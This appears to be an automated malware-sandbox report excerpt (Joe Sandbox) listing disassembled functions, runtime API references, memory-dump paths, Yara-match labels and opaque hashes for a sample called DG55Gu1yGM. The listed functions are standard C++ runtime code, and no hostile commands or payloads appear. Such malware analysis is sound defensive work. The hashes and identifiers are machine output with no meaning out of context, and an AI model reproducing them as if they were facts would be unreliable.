Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction ID: ec8ca585eda384a979b30d29286f6fc15997febf5c7dbe5ae9991d975d689263
Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction Fuzzy Hash: C90117B6400604AFC725DFA5C881EDAB7EAEF49320F008A1EA95A87550DB70F9548BA0

Function 021250CA Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 021250D1

Part of subcall function 0212BDAE: __EH_prolog3_GS.LIBCMT ref: 0212BDB5

std::_Locinfo::_Locinfo.LIBCPMT ref: 0212511C
__Getcoll.LIBCPMT ref: 0212512B
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0212513B

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
Instruction ID: 3063dea6045ac9a5a506fe291e3669a0ac628bdacabc8d73e7b952e37c5f518f
Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
Instruction Fuzzy Hash: 2B01BC71890328EFDB04EFA4C480BDCBBB2FF54325F51802AE054AB280CB759668CF91

Function 02125B86 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 02125B8D

Part of subcall function 0212BDAE: __EH_prolog3_GS.LIBCMT ref: 0212BDB5

std::_Locinfo::_Locinfo.LIBCPMT ref: 02125BD8
__Getcoll.LIBCPMT ref: 02125BE7
std::_Locinfo::~_Locinfo.LIBCPMT ref: 02125BF7

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
Instruction ID: 2d6970d396e017f5fc60a40ded20f10682e2b11abba9144e082de3f95873bb70
Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
Instruction Fuzzy Hash: A9017171990318EFDB04EFA4C484BDDB7B2FF14315F51802AE055AB280DB759568CF95

Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00405926

Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E

std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
__Getcoll.LIBCPMT ref: 00405980
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98

Function 0213C13E Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0213C170
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0213C180
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0213C190
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0213C1A4

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: b65752fef761a54935ab22da55b606504ba6a649f1c6913d20272d43b2c0b64d
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 4501A47A484149EBDF179E94DC018AE3BA7AB25260F048412F928A4060D732C6B0AAC1

Function 0041BED7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D

Function 02133773 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0213378C

Part of subcall function 02132B16: ___crtGetTimeFormatEx.LIBCMT ref: 02132B2C
Part of subcall function 02132B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02132B4B

GetLastError.KERNEL32 ref: 021337A8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021337BE
__CxxThrowException@8.LIBVCRUNTIME ref: 021337CC

Part of subcall function 021328EC: SetThreadPriority.KERNEL32(?,?), ref: 021328F8

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction ID: fc9ecde593dc85880803126959aff92b664132d771b7fc19ace6906f08c2aeca
Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction Fuzzy Hash: 36F0A7B2A802153EE725B7755C06FBB36DD9B01751F500876B915E6181EFA8D8048AF8

Function 0212D486 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 02131342

Part of subcall function 02130BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02130BD6
Part of subcall function 02130BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 02130BF7

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 02131355
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 02131361
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0213136A

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
Instruction ID: f341a5720d415fcb5f597e54ae1b9adcc5ad6ae0e3b816668e80c147bcea7e2c
Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
Instruction Fuzzy Hash: 4CF02E312C0308BF8F1ABAB808105BE32E7AF95324F080129E422AF3C0DF718D018A94

Function 0040D21F Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB

Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: fd7acda8583d43d34e0fea9ad2346c924928eae7e839b4fe7c8e1ae8ec2b6d3b
Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
Opcode Fuzzy Hash: fd7acda8583d43d34e0fea9ad2346c924928eae7e839b4fe7c8e1ae8ec2b6d3b
Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D

Function 0041350C Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525

Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4

GetLastError.KERNEL32 ref: 00413541
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
__CxxThrowException@8.LIBVCRUNTIME ref: 00413565

Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC

Function 0213D074 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0213D088
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0213D0AC
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0213D0BF
__CxxThrowException@8.LIBVCRUNTIME ref: 0213D0CD

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3657713681-0
Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction ID: 5907dfe61fd1196411322f436418b0abe9503ecd082520103185e998751fbf21
Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction Fuzzy Hash: 1FF09E35A80304ABC726FB50FC40D5EB37B9FD0F14361857AD90517281DF31E90ACA92

Function 02125A67 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

std::_Cnd_initX.LIBCPMT ref: 02125A83
__Cnd_signal.LIBCPMT ref: 02125A8F
std::_Cnd_initX.LIBCPMT ref: 02125AA4
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 02125AAB

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction ID: 86b80e8b7aa20c1876f0869ae08c218667f64390790edee2a780229d9168aa9c
Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction Fuzzy Hash: 86F0A735480710AFEB25B770E80571A73B3AF01724F144519F045568A0CF7AA87D4E55

Function 02132858 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 0213286F
GetLastError.KERNEL32(?,?,?,?,02138830,?,?,?,?,00000000,?,00000000), ref: 0213287E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02132894
__CxxThrowException@8.LIBVCRUNTIME ref: 021328A2

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction ID: ca065bbb234a0734077b82b14016ccf8281ef44a045786d7c8df2636031eb357
Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction Fuzzy Hash: 58F0A03464010ABBCF01FFE8CD45EAF37B96B00701F200660B914E20A0DB34DA149BA4

Function 004125F1 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
__CxxThrowException@8.LIBVCRUNTIME ref: 0041263B

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768

Function 0213257D Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 02132593
GetLastError.KERNEL32(?,?,?,?,?,02130DA0), ref: 021325A1
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021325B7
__CxxThrowException@8.LIBVCRUNTIME ref: 021325C5

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction ID: a66cf5390489279ce2ae19876200e9fd91efaddd63e6e5636b27d88306a84465
Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction Fuzzy Hash: 6BE0D861A803162DE711B7B44C13FBB369D5B00B41F540861BD14E10C1FFA4E60449A4

Function 00412316 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 0041232C
GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
__CxxThrowException@8.LIBVCRUNTIME ref: 0041235E

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC

Function 02139530 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02132959: TlsAlloc.KERNEL32(?,02130DA0), ref: 0213295F

TlsAlloc.KERNEL32(?,02130DA0), ref: 02143BE6
GetLastError.KERNEL32 ref: 02143BF8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02143C0E
__CxxThrowException@8.LIBVCRUNTIME ref: 02143C1C

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction ID: c277fdce9a8330b704ccbc535df54ea83c5ba422147d7d4a242dc7b6a7e895f5
Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction Fuzzy Hash: 43E06874580206AFC310BFB59C4AB7E72AA6B003117300E76E439D20A0EF34D1058F6C

Function 004192C9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8

TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
GetLastError.KERNEL32 ref: 00423991
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
__CxxThrowException@8.LIBVCRUNTIME ref: 004239B5

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D

Function 02132794 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02130DA0), ref: 0213279E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02130DA0), ref: 021327AD
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021327C3
__CxxThrowException@8.LIBVCRUNTIME ref: 021327D1

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction ID: 6958f460681eb5663124b6aa06c9c049f828a3c0badf05d246b1c9f359736be8
Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction Fuzzy Hash: 0DE0867464010AABCB00FBF5DD49EAF73BD7B00B05B600575A905E3150EB78DB088B79

Function 0041252D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412537
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412546
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041256A

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C

Function 021328EC Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 021328F8
GetLastError.KERNEL32 ref: 02132904
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0213291A
__CxxThrowException@8.LIBVCRUNTIME ref: 02132928

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction ID: de09b584c036983a65058b654ffb6d4a6803692e74e5d30957d71feacd39d43d
Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction Fuzzy Hash: 13E0863454011AABCB15BF75CC05BBB37AD6B00745B504925BC19D20A0EF39D5148B98

Function 021329B2 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,02137BD8,00000000,?,?,02130DA0,?,?,?,00000000,?,00000000), ref: 021329BE
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 021329CA
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021329E0
__CxxThrowException@8.LIBVCRUNTIME ref: 021329EE

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction ID: 8a2354caa57de708a9aaff1bea08cf2f09df4a4548e45b820b4eb385662854e3
Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction Fuzzy Hash: 72E086341401196BDB11BF74CC09BBF37AD6F00745B500925BD19D20A0EF35D5149BA8

Function 00412685 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 00412691
GetLastError.KERNEL32 ref: 0041269D
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
__CxxThrowException@8.LIBVCRUNTIME ref: 004126C1

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
